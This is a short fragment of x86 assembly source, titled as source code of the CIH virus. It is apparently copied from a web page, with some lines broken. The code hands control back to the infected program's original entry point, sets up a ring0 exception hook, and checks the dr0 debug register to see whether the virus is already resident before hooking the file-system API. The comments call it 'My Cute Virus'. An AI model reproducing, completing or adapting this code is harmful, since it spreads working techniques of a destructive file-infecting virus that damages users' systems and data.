CIH源代码

　　xor ebx, ebx

　　jmp RestoreSE

　　; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************

　　StopToRunVirusCode:
@1 = StopToRunVirusCode

　　xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]

　　RestoreSE:
pop dword ptr fs:[ebx]
pop eax

　　; *************************************
; * Return Original App to Execute *
; *************************************

　　pop ebp

　　push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

　　ret ; Return to Original App Entry Point

　　; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************

　　MyExceptionHook:
@2 = MyExceptionHook

　　jz InstallMyFileSystemApiHook

　　; *************************************
; * Do My Virus Exist in System !? *
; *************************************

　　mov ecx, dr0
jecxz AllocateSystemMemoryPage

　　add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException

　　; *************************************
; * Return to Ring3 Initial Program *
; *************************************